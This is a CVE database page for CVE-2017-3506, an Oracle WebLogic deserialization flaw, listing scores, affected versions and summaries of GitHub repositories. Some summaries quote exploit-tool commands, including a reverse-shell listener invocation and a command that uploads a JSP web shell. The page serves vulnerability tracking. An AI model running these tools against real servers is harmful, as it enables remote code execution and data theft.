CVE-2017-3506

Published: 24/04/2017 Updated: 03/10/2019
CVSS v2 Base Score: 5.8 | Impact Score: 4.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.4 | Impact Score: 5.2 | Exploitability Score: 2.2
VMScore: 519
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

Vulnerable Product

oracle weblogic server 12.2.1.0.0

oracle weblogic server 12.2.1.2.0

oracle weblogic server 12.2.1.1.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 10.3.6.0.0

Github Repositories

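Some notes from my own study of Java security, mainly related to security auditing

javasec These are some notes from my study of Java security auditing. Each article may not be very long and may cover only a single topic, but the shorter the articles are, the easier it is for me to keep going and finish the series~ This series does not try to cover every detail, but aims to explain each topic it mentions in plain, easy-to-understand language. Planned article structure (to be completed): Java reflection mechanism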

A tool for ERP penetration testing

ERPSCAN EBS Pentesting tool ERPScan_EBS_Pentesting_Toolpy This is ERPSCAN EBS Pentesting tool for ERPScan site It is a wrapper for ERPSCAN EBS checking modules There are 4 main modules (1 module uses EBS Users' passwords decryptor ebsDecryptpy): EBS DB Users Brute-force (dbUsersBforcepy), EBS Users Brute-force (ebsUsersBforcepy), EBS Java Serialization test (javaS

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets

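WebLogic XMLDecoder deserialization vulnerability exploitation tool

XMLDecoder_unser WebLogic XMLDecoder deserialization vulnerability exploitation tool, mainly targeting the vulnerabilities CVE-2017-3506 and CVE-2017-10271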

Oracle-WebLogic-CVE-2017-10271

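WebLogic Wls-wsat XMLDecoder Vulnerability description mitre:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-3506 Early on, attackers used vulnerabilities in the WebLogic WLS component to launch large-scale remote attacks against enterprise servers. A large number of enterprise servers were compromised, and the number of attacked enterprises showed a clear upward trend, which calls for serious attention. Among these, CVE-2017-3506 is one that exploits the WLS in Oracle WebLogic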

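PoCs for the WebLogic XMLDecoder series of vulnerabilities

Weblogic-XMLDecoder-POC PoCs for the WebLogic XMLDecoder series of vulnerabilities. Vulnerability versions: CVE-2017-3506 CVE-2017-10271 CVE-2019-2725. CVE-2017-3506: the project's poc/2017-3506 directory contains two PoCs: poc1xml: executes a command that creates a file named diggid under /tmp; verification requires entering the Docker container. poc2xml: reverse shell; requires an outbound connection. CVE-2017-10271: same as 3506. CVE-2019-2725: the project's poc/2019-2725 directory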

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

CVE-2019-2725 WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit Info / Help $ python3 weblogic_exploitpy -h ======================================================================== | WebLogic Universal Exploit | | CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2

CVE-2017-3506

What is this? This is a poc of CVE-2017-3506(Weblogic XMLDecoder Serialization) How to use it? check vul java -jar WebLogic-XMLDecoderjar -u 192168174144:7001 GetShell java -jar WebLogic-XMLDecoderjar -s 192168174144:7001 /wls-wsat/CoordinatorPortType11 shelljsp Then you can
